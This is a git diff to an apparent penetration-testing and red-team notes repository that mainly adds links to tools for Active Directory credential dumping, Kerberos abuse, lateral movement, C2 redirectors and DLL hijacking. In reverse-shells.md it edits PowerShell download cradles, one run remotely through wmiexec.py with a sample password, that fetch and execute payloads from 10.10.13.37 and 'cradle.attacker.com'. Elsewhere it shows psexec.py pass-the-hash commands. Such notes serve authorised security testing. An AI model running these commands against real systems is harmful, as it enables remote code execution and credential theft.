diff --git a/pentest/infrastructure/ad/README.md b/pentest/infrastructure/ad/README.md index 2e1a3a6..c89a638 100644 --- a/pentest/infrastructure/ad/README.md +++ b/pentest/infrastructure/ad/README.md @@ -61,6 +61,7 @@ - [GOAD - part 10 - Delegations](https://mayfly277.github.io/posts/GOADv2-pwning-part10/) - [GOAD - part 11 - ACL](https://mayfly277.github.io/posts/GOADv2-pwning-part11/) - [GOAD - part 12 - Trusts](https://mayfly277.github.io/posts/GOADv2-pwning-part12/) +- [GOAD - part 13 - Having fun inside a domain](https://mayfly277.github.io/posts/GOADv2-pwning-part13/) - [https://github.com/Orange-Cyberdefense/GOAD](https://github.com/Orange-Cyberdefense/GOAD) @@ -433,6 +434,7 @@ PV3 > Get-DomainGPO -Name "" -Properties DisplayName * [https://github.com/maaaaz/impacket-examples-windows](https://github.com/maaaaz/impacket-examples-windows) * [https://github.com/icyguider/MoreImpacketExamples](https://github.com/icyguider/MoreImpacketExamples) * [https://tools.thehacker.recipes/impacket](https://tools.thehacker.recipes/impacket) +* [https://www.synacktiv.com/en/publications/traces-of-windows-remote-command-execution.html](https://www.synacktiv.com/en/publications/traces-of-windows-remote-command-execution.html) * [https://habr.com/ru/post/703332/](https://habr.com/ru/post/703332/) Install: diff --git a/pentest/infrastructure/ad/credential-harvesting/README.md b/pentest/infrastructure/ad/credential-harvesting/README.md index 668f03e..546e593 100644 --- a/pentest/infrastructure/ad/credential-harvesting/README.md +++ b/pentest/infrastructure/ad/credential-harvesting/README.md @@ -1,5 +1,7 @@ # Credentials Harvesting +- [https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary](https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary) + diff --git a/pentest/infrastructure/ad/credential-harvesting/lsa.md b/pentest/infrastructure/ad/credential-harvesting/lsa.md index 355a02b..aa941b4 100644 --- a/pentest/infrastructure/ad/credential-harvesting/lsa.md +++ b/pentest/infrastructure/ad/credential-harvesting/lsa.md @@ -6,6 +6,7 @@ description: Local Security Authority * [https://www.passcape.com/index.php?section=docsys&cmd=details&id=23](https://www.passcape.com/index.php?section=docsys&cmd=details&id=23) * [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets) +* [https://github.com/laxa/SharpSecretsdump](https://github.com/laxa/SharpSecretsdump) diff --git a/pentest/infrastructure/ad/kerberos/README.md b/pentest/infrastructure/ad/kerberos/README.md index 9770306..348d358 100644 --- a/pentest/infrastructure/ad/kerberos/README.md +++ b/pentest/infrastructure/ad/kerberos/README.md @@ -68,6 +68,7 @@ python3 keytab.py keytab.kt - [https://github.com/OtterHacker/Cerbere](https://github.com/OtterHacker/Cerbere) - [https://xakep.ru/2023/04/04/no-mimikatz/](https://xakep.ru/2023/04/04/no-mimikatz/) - [https://github.com/MzHmO/articles/tree/main/Ticket%20Injector](https://github.com/MzHmO/articles/tree/main/Ticket%20Injector) +- [https://github.com/MzHmO/PowershellKerberos](https://github.com/MzHmO/PowershellKerberos) diff --git a/pentest/infrastructure/ad/lateral-movement/rpc.md b/pentest/infrastructure/ad/lateral-movement/rpc.md index 9541c73..dfcf42d 100644 --- a/pentest/infrastructure/ad/lateral-movement/rpc.md +++ b/pentest/infrastructure/ad/lateral-movement/rpc.md @@ -5,6 +5,7 @@ description: Remote Procedure Call # RPC - [https://sensepost.com/blog/2021/building-an-offensive-rpc-interface/](https://sensepost.com/blog/2021/building-an-offensive-rpc-interface/) +- [https://github.com/s0i37/lateral](https://github.com/s0i37/lateral) diff --git a/pentest/infrastructure/ad/lateral-movement/smb.md b/pentest/infrastructure/ad/lateral-movement/smb.md index fa14d78..f5a70c4 100644 --- a/pentest/infrastructure/ad/lateral-movement/smb.md +++ b/pentest/infrastructure/ad/lateral-movement/smb.md @@ -20,3 +20,11 @@ description: Server Message Block $ psexec.py snovvcrash:'Passw0rd!'@192.168.11.1 $ rlwrap -cAr psexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 megacorp.local/snovvcrash@192.168.11.1 powershell ``` + + + + +## SMB Pivoting + +- [https://habr.com/ru/articles/460659/](https://habr.com/ru/articles/460659/) +- [https://github.com/mis-team/rsockspipe](https://github.com/mis-team/rsockspipe) diff --git a/pentest/infrastructure/networks/scanning.md b/pentest/infrastructure/networks/scanning.md index 7170bb5..fa7f65a 100644 --- a/pentest/infrastructure/networks/scanning.md +++ b/pentest/infrastructure/networks/scanning.md @@ -487,6 +487,16 @@ $ python3 gateway-finder-imp.py -D file_with_dst_IPs.txt -M file_with_nex_hop_MA +### tracebuster + +- [https://github.com/s0i37/net/blob/main/tracebuster.py](https://github.com/s0i37/net/blob/main/tracebuster.py) + +``` +$ python3 tracebuster.py 4 udp 192.168.1.0/24 53 2>/dev/null +``` + + + ### NetBIOS diff --git a/pentest/shells/reverse-shells.md b/pentest/shells/reverse-shells.md index 798bf68..5068a63 100644 --- a/pentest/shells/reverse-shells.md +++ b/pentest/shells/reverse-shells.md @@ -124,9 +124,9 @@ $stream.Dispose() - [https://github.com/mdsecactivebreach/PowerDNS](https://github.com/mdsecactivebreach/PowerDNS) ``` -'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.megacorp.com"""" 16).Strings[0]' +'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.attacker.com"""" 16).Strings[0]' -wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.megacorp.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt' +wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.attacker.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt' ``` diff --git a/redteam/infrastructure.md b/redteam/infrastructure.md index 9c76b60..9f25570 100644 --- a/redteam/infrastructure.md +++ b/redteam/infrastructure.md @@ -2,6 +2,7 @@ - [https://ditrizna.medium.com/design-and-setup-of-c2-traffic-redirectors-ec3c11bd227d](https://ditrizna.medium.com/design-and-setup-of-c2-traffic-redirectors-ec3c11bd227d) - [https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4](https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4) +- [https://rastamouse.me/sharpc2-https-with-redirector/](https://rastamouse.me/sharpc2-https-with-redirector/) - [https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki) - [https://github.com/mgeeky/RedWarden](https://github.com/mgeeky/RedWarden) - [[PDF] Orchestrating Resilient Red Team Operations (Yiannis Ioannides)](https://github.com/secgroundzero/BSides-Cyprus-2019/blob/master/bsides_Cyprus_Yiannis.pdf) @@ -285,8 +286,8 @@ Install from apt: ``` $ sudo apt install debian-keyring debian-archive-keyring apt-transport-https -y -$ curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo tee /etc/apt/trusted.gpg.d/caddy-stable.asc -$ curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list +$ curl -1sLf https://dl.cloudsmith.io/public/caddy/stable/gpg.key | sudo tee /etc/apt/trusted.gpg.d/caddy-stable.asc +$ curl -1sLf https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt | sudo tee /etc/apt/sources.list.d/caddy-stable.list $ sudo apt update $ sudo apt install caddy -y ``` @@ -324,6 +325,7 @@ Config sample to act as a reverse proxy: log #debug admin off + #default_sni example.com #auto_https disable_redirects } diff --git a/redteam/maldev/dll-hijacking.md b/redteam/maldev/dll-hijacking.md index a0a9824..56cbf6a 100644 --- a/redteam/maldev/dll-hijacking.md +++ b/redteam/maldev/dll-hijacking.md @@ -47,6 +47,8 @@ PS > python .\PackMyPayload.py .\out\ .\out\a.iso --out-format iso --hide OneDri ## Tools +- [https://github.com/monoxgas/Koppeling](https://github.com/monoxgas/Koppeling) +- [https://github.com/Flangvik/SharpDllProxy](https://github.com/Flangvik/SharpDllProxy) - [https://github.com/tothi/dll-hijack-by-proxying](https://github.com/tothi/dll-hijack-by-proxying)